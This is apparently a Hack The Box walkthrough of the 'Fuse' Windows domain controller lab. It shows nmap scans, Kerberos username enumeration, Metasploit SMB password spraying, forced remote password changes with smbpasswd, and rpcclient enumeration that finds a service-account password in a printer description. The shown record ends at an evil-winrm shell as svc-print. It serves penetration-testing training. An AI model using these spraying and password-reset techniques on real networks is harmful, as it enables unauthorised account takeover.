HTB - Fuse
Overview
This medium-difficulty Windows machine gave me a chance to exploit a vulnerable service that we hear of often in training as being an overlooked problem for many Enterprises: printer management. While this challenge did not involve exploiting an actual print spooler service, it drew attention to the problems that misconfigurations can cause especially when dealing with credentialed service accounts. This machine is on TJ_Null’s list of OSCP-like machines. Have fun!
You may see me using Metasploit more starting from this machine. I recently went through a class where we used it quite a bit, so I learned that it isn’t as bad as I thought and can even help workflow in some cases. I am probably still going to avoid easy-button exploits unless crunched for time (always depending on what is available!). It’s about the learning journey, not the end result of capturing the flags.
Useful Skills and Tools
For this machine I tried using the Three Ms (tm) a bit more than usual, to somewhat mixed success.
- Metasploit
- msfvenom
- meterpreter
Enumeration
Nmap scan
I started my enumeration with an nmap scan of 10.10.10.193. The options I regularly use are:
Flag | Purpose |
|---|---|
-p- | A shortcut which tells nmap to scan all ports |
-vvv | Gives very verbose output so I can see the results as they are found, and also includes some information not normally shown |
-sC | Equivalent to --script=default and runs a collection of nmap enumeration scripts against the target |
-sV | Does a service version scan |
-oA $name | Saves all three formats (standard, greppable, and XML) of output with a filename of $name |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ nmap -n -v -p- -sCV -oA fuse 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.044s latency).
Not shown: 65514 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-25 18:22:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49760/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h39m16s, deviation: 4h02m32s, median: 19m14s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-09-25T11:24:29-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-25T18:24:25
|_ start_date: 2020-09-25T17:42:57
Nmap done: 1 IP address (1 host up) scanned in 410.91 seconds
This machine had many ports open. From the ports and services that were open this appeared to be a domain controller running Windows Server 2016.
Port 80 - HTTP
Navigating to port 80 redirected me to http://fuse.fabricorp.local/papercut/logs/html/index.htm. I had to add fuse.fabricorp.local to my local hosts file to proceed. I was greeted by a PaperCut print logger site, without any authentication protecting it. I clicked on view HTML for each of the print history pages to see what kind of documents had been printed recently.
Each of the three pages contained potential usernames and client computer names in the print history and a number of interesting sounding document titles.
1
2
3
4
5
6
7
8
9
10
11
12
13
Time User Pages Copies Printer Document Client Duplex Grayscale
Print Logs - 29 May 2020
17:50:10 pmerton 1 1 HP-MFT01 New Starter - bnielson - Notepad LETTER, 19kb, PCL6 JUMP01 No Yes
17:53:55 tlavel 1 1 HP-MFT01 IT Budget Meeting Minutes - Notepad LETTER, 52kb, PCL6 LONWK015 No Yes
Print Logs - 30 May 2020
16:37:45 sthompson 1 1 HP-MFT01 backup_tapes - Notepad LETTER, 20kb, PCL6 LONWK019 No Yes
16:42:19 sthompson 1 1 HP-MFT01 mega_mountain_tape_request.pdf LETTER, 20kb, PCL6 LONWK019 No No
17:07:06 sthompson 1 1 HP-MFT01 Fabricorp01.docx - Word LETTER, 153kb, PCL6 LONWK019 No Yes
Print Logs - 10 Jun 2020
17:40:21 bhult 1 1 HP-MFT01 offsite_dr_invocation - Notepad LETTER, 19kb, PCL6 LAPTOP07 No Yes
19:18:17 administrator 1 1 HP-MFT01 printing_issue_test - Notepad LETTER, 16kb, PCL6 FUSE No Yes
I found six potential usernames (including bnielson in one of the document titles. The document title Fabricorp01.docx also stuck out to me as looking like the perfect type of thing that corporate users would likely use as a password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 auxiliary(gather/kerberos_enumusers) > run
[*] Running module against 10.10.10.193
[*] Validating options...
[*] Using domain: FABRICORP...
[*] 10.10.10.193:88 - Testing User: "pmerton"...
[*] 10.10.10.193:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.193:88 - User: "pmerton" is present
[*] 10.10.10.193:88 - Testing User: "tlavel"...
[*] 10.10.10.193:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.193:88 - User: "tlavel" is present
[*] 10.10.10.193:88 - Testing User: "sthompson"...
[*] 10.10.10.193:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.193:88 - User: "sthompson" is present
[*] 10.10.10.193:88 - Testing User: "bhult"...
[*] 10.10.10.193:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.193:88 - User: "bhult" is present
[*] 10.10.10.193:88 - Testing User: "administrator"...
[*] 10.10.10.193:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.193:88 - User: "administrator" is present
[*] 10.10.10.193:88 - Testing User: "bnielson"...
[*] 10.10.10.193:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.193:88 - User: "bnielson" is present
[*] Auxiliary module execution complete
Unfortunately these users all had Kerberos pre-authentication enabled, but I was able to confirm that all of them were valid usernames.
At first I started chasing the little white rabbit while doing research about this PaperCut service.
I managed to find some interesting results that looked like a potential way to retrieve printed documents through backups, but either I did not have the proper privileges, or these options were not active on this site.
- https://www.papercut.com/kb/Main/RetrieveDeletedUserPrintData#restore-from-a-backup-on-to-a-test-server
- https://www.papercut.com/support/resources/manuals/ng-mf/common/topics/sys-backups.html
- [app-path]\server\data\backups
- https://nvd.nist.gov/vuln/detail/CVE-2019-8948
After exhausting those possibilities, I went back and tried to do a good ol’ brute force enumeration using the valid usernames I had found and the potential password I had spotted.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
msf5 auxiliary(gather/kerberos_enumusers) > search type:auxiliary smb
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
...snipped...
55 auxiliary/scanner/smb/smb_enumusers normal No SMB User Enumeration (SAM EnumUsers)
56 auxiliary/scanner/smb/smb_enumusers_domain normal No SMB Domain User Enumeration
57 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner
58 auxiliary/scanner/smb/smb_lookupsid normal No SMB SID User Enumeration (LookupSid)
59 auxiliary/scanner/smb/smb_ms17_010
...snipped...
msf5 auxiliary(scanner/smb/smb_enumusers) > use 57
msf5 auxiliary(scanner/smb/smb_login) > options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS 10.10.10.193 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > set user_file users
user_file => users
msf5 auxiliary(scanner/smb/smb_login) > set smbpass Fabricorp01
smbpass => Fabricorp01
msf5 auxiliary(scanner/smb/smb_login) > set smbdomain FABRICORP
smbdomain => FABRICORP
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.193:445 - 10.10.10.193:445 - Starting SMB login bruteforce
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\pmerton:Fabricorp01',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'FABRICORP\tlavel:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\sthompson:Fabricorp01',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'FABRICORP\bhult:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\administrator:Fabricorp01',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'FABRICORP\bnielson:Fabricorp01'
[*] 10.10.10.193:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
After running the smb_login scanner I found that not only had one person used this as their password, but three people had!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ smbclient -U "FABRICORP\bnielson" -L \\\\10.10.10.193\\
Enter FABRICORP\bnielson's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ smbclient -U "FABRICORP\tlavel" -L \\\\10.10.10.193\\ 1 ⨯
Enter FABRICORP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ smbclient -U "FABRICORP\bhult" -L \\\\10.10.10.193\\ 1 ⨯
Enter FABRICORP\bhult's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
However, I got an interesting error back when trying to enumerate open shares for these three users: NT_STATUS_PASSWORD_MUST_CHANGE. I looked this up and found out that this meant that the user’s passwords had expired and would have to be changed before they could log in. Next, I did some research on changing SMB login passwords remotely from a Linux command line.
How does one go about changing the windows password from a unix machine with no physical access to the windows machine sharing things?
SWAT provides the password change facility you are looking for. If you prefer a command line tool, smbpasswd has the same functionality - check the -U and -r options. The smbpasswd man page documents the password change options.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
-r remote machine name
This option allows a user to specify what machine they wish to change their password on.
Without this parameter smbpasswd defaults to the local host. The remote machine name is
the NetBIOS name of the SMB/CIFS server to contact to attempt the password change. This
name is resolved into an IP address using the standard name resolution mechanism in all
programs of the Samba suite. See the -R name resolve order parameter for details on
changing this resolving mechanism.
The username whose password is changed is that of the current UNIX logged on user. See the
-U username parameter for details on changing the password for a different username.
Note that if changing a Windows NT Domain password the remote machine specified must be
the Primary Domain Controller for the domain (Backup Domain Controllers only have a
read-only copy of the user account database and will not allow the password change).
I checked the man page for smbpasswd to see what the -r and -U options did, and found out that that these flags let me specify a remote host (-r) and username (U).
1
2
3
4
5
6
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ smbpasswd -r 10.10.10.193 -U bnielson 1 ⨯
Old SMB password: Fabricorp01
New SMB password: test
Retype new SMB password: test
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
I used this to try to change the password for bnielson, but it seemed as if there were some sort of password complexity rules in place.
The passwords will not show up on the screen like in my output above and below. I added them to illustrate what I had done since the two code output boxes were identical without them!
1
2
3
4
5
6
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password: Fabricorp01
New SMB password: $Up3rC0mp13xP@$$w0rd
Retype new SMB password: $Up3rC0mp13xP@$$w0rd
Password changed for user bnielson
After choosing a more complex password, I was able to change it successfully.
If you change a user’s password, and find that after a minute or so that your password isn’t working, this is intended by the machine creator. Especially on the free servers there may be a lot of people trying to exploit the machine at the same time, so this saves the trouble of a million machine resets. (But it is still annoying if you don’t know what’s going on!)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ smbclient -U "bnielson" -L \\\\10.10.10.193\\
Enter WORKGROUP\bnielson's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HP-MFT01 Printer HP-MFT01
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Next I used my new password for bnielson to enumerate open SMB shares. Besides the standard default shares, there were also a HP-MFT01 and a $print share.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ rpcclient -U bnielson 10.10.10.193
Enter WORKGROUP\bnielson's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $> enumprivs 0x451
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
rpcclient $> lsaaddacctrights
Usage: lsaaddacctrights SID [rights...]
rpcclient $> lsaaddacctrights 0x451 SeDebugPrivilege
result was NT_STATUS_NONE_MAPPED
rpcclient $> srvinfo
10.10.10.193 Wk Sv PDC Tim PrQ NT
platform_id : 500
os version : 10.0
server type : 0x80122b
rpcclient $> netshareenum
result was WERR_ACCESS_DENIED
rpcclient $> queryuser 0x451
User Name : bnielson
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : Fri, 25 Sep 2020 18:43:58 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Wed, 31 Dec 1969 19:00:00 EST
Password can change Time : Wed, 31 Dec 1969 19:00:00 EST
Password must change Time: Wed, 31 Dec 1969 19:00:00 EST
unknown_2[0..31]...
user_rid : 0x451
group_rid: 0x201
acb_info : 0x00020010
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000000
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $> querygroup 0x201
Group Name: Domain Users
Description: All domain users
Group Attribute:7
Num Members:14
rpcclient $> queryusergroups
Usage: queryusergroups rid [access mask]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[IT_Accounts] rid:[0x644]
rpcclient $> querygroupmem 0x200
rid:[0x1f4] attr:[0x7]
rid:[0x641] attr:[0x7]
rpcclient $> queryuser 0x641
User Name : sthompson
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : Sat, 30 May 2020 19:31:57 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Sat, 30 May 2020 19:30:58 EDT
Password can change Time : Sun, 31 May 2020 19:30:58 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x641
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000001
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $> queryuser 0x1f4
User Name : Administrator
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : Fri, 25 Sep 2020 16:23:52 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Sat, 30 May 2020 20:26:24 EDT
Password can change Time : Sun, 31 May 2020 20:26:24 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00001745
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $> dsroledominfo
Machine Role = [5]
Directory Service is running.
Domain is in native mode.
rpcclient $> chgpasswd 0x641
Usage: chgpasswd username oldpass newpass
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> getusrdompwinfo 0x641
&info: struct samr_PwInfo
min_password_length : 0x0007 (7)
password_properties : 0x00000001 (1)
1: DOMAIN_PASSWORD_COMPLEX
0: DOMAIN_PASSWORD_NO_ANON_CHANGE
0: DOMAIN_PASSWORD_NO_CLEAR_CHANGE
0: DOMAIN_PASSWORD_LOCKOUT_ADMINS
0: DOMAIN_PASSWORD_STORE_CLEARTEXT
0: DOMAIN_REFUSE_PASSWORD_CHANGE
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
After enumerating the machine through RPC with rpcclient for awhile and finding a bunch of useful information, I hit the jackpot when checking for printers. In the description field someone had left a helpful note telling users where the printer was located, and also what the password was!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.193:445 - 10.10.10.193:445 - Starting SMB login bruteforce
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\pmerton:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\pmerton:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\pmerton:$fab@s3Rv1ce$1',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'FABRICORP\tlavel:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\sthompson:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\sthompson:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\sthompson:$fab@s3Rv1ce$1',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'FABRICORP\bhult:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\administrator:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\administrator:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\administrator:$fab@s3Rv1ce$1',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'FABRICORP\bnielson:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\Administrator:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\Administrator:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\Administrator:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\Guest:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\Guest:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\Guest:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\krbtgt:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\krbtgt:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\krbtgt:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\DefaultAccount:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\DefaultAccount:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\DefaultAccount:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\svc-print:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\svc-print:Fabricorp01',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'FABRICORP\svc-print:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\sthompson:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\sthompson:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\sthompson:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\pmerton:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\pmerton:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\pmerton:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\svc-scan:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\svc-scan:Fabricorp01',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'FABRICORP\svc-scan:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\dandrews:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\dandrews:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\dandrews:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\mberbatov:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\mberbatov:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\mberbatov:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\astein:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\astein:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\astein:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\dmuir:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\dmuir:Fabricorp01',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: 'FABRICORP\dmuir:$fab@s3Rv1ce$1',
[*] 10.10.10.193:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Next I ran a brute force login attack against SMB after adding the new usernames and passwords to my lists. I noticed that again there was more than one user sharing a password. Both svc-print and svc-scan service accounts used the same password.
Initial Foothold
Further enumeration
I tried using the winrm enumeration module in metasploit, but for some reason it returned no valid logins. After playing around with different things for awhile trying to get something to work, the colored text in ZSH saved me. I noticed that the $ in the password were being interpreted as a special character by the terminal. Once I wrapped the password in single quotes I was able to login using evil-winrm.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i 10.10.10.193 -P 5985
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents> ls
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=================== ==============================================
